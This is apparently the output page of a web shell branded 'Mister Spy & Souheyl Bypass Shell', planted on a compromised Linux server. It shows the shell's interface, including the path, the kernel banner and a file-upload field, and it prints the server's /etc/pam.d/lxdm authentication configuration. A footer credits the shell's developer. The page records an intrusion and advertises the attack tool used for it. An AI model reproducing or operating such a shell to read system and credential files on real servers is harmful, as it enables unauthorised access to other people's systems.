Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/mail/etc/pam.d/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //var/mail/etc/pam.d/lxdm

#%PAM-1.0
# Comments stolen from lightdm-pam-file
# Block login if they are globally disabled
auth    requisite       pam_nologin.so

# Load environment from /etc/environment and ~/.pam_environment
auth    required        pam_env.so readenv=1
auth    required        pam_env.so readenv=1 envfile=/etc/default/locale
auth    required        pam_env.so readenv=1 envfile=/etc/lxdm-environment

# auth    sufficient      pam_succeed_if.so user ingroup nopasswdlogin
@include common-auth
auth    optional        pam_gnome_keyring.so
@include common-account

# SELinux needs to be the first session rule. This ensures that any
# lingering context has been cleared. Without out this it is possible
# that a module could execute code in the wrong domain.
# When the module is present, "required" would be sufficient (When SELinux
# is disabled, this returns success.)
#
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close

session required       pam_unix.so 	  # added by klaumi
session required        pam_limits.so
session required       pam_loginuid.so 	  # added by klaumi
# @include common-session-noninteractive  # commented out by klaumi
@include common-session 		  # added by klaumi

# SELinux needs to intervene at login time to ensure that the process
# starts in the proper default security context. Only sessions which are
# intended to run in the user's context should be run after this.
# When the module is present, "required" would be sufficient (When SELinux
# is disabled, this returns success.)
#
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open

session optional        pam_gnome_keyring.so auto_start

session optional        pam_systemd.so

@include common-password

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net